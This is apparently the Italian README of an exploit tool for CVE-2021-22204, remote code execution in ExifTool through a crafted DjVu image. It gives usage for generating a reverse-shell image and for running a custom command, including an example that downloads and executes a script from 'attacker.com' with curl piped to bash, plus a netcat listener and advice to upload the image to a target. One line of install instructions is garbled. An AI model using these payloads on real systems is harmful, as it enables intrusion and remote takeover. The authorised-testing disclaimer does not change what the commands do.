
Exploit RCE per ExifTool (CVE-2021-22204) - versione migliorata, nessuna dipendenza da exiftool
Un exploit aggiornato per CVE-2021-22204, una vulnerabilità in ExifTool versioni 7.44 fino a 12.23 che consente l'esecuzione di codice arbitrario durante l'elaborazione di file DjVu dannosi.
La neutralizzazione impropria dei dati dell'utente nel formato di file DjVu in ExifTool versioni 7.44 a 12.23 consente l'esecuzione di codice arbitrario durante l'analisi di un'immagine dannosa. Questo exploit genera un file immagine dannoso che, quando elaborato da una versione vulnerabile di ExifTool, esegue codice controllato dall'attaccante.
Questa è una versione aggiornata ispirata da UNICORDev/exploit-CVE-2021-22204, con i seguenti miglioramenti:
exiftool -config per incorporare il payload, che fallisce se il tuo ExifTool è patchato (v12.24+). Questa versione crea un payload DjVu puro usando solo djvumake.\c)djvulibre-binsudo apt install djvulibre-bin
Reverse Shell:
python3 exploit.py -s <LHOST> <LPORT>
Comando personalizzato:
python3 exploit.py -c "id > /tmp/pwned"
Esempi:
# Genera payload per reverse shell
python3 exploit.py -s 192.168.1.100 4444
# Genera payload per esecuzione comandi
python3 exploit.py -c "curl http://attacker.com/shell.sh | bash"
# Avvia listener e attendi connessione
nc -nlvp 4444
L'exploit genera image.jpg - carica questo file su un target dove ExifTool lo elaborerà.
Questo strumento è fornito solo a scopo di test di sicurezza educativi e autorizzati.
L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento. Utilizza questo exploit solo contro sistemi di tua proprietà o per i quali hai esplicito permesso scritto per testarli.
L'accesso non autorizzato a sistemi informatici è illegale e punibile per legge. Utilizza responsabilmente.
Licenza MIT - Vedi file LICENSE.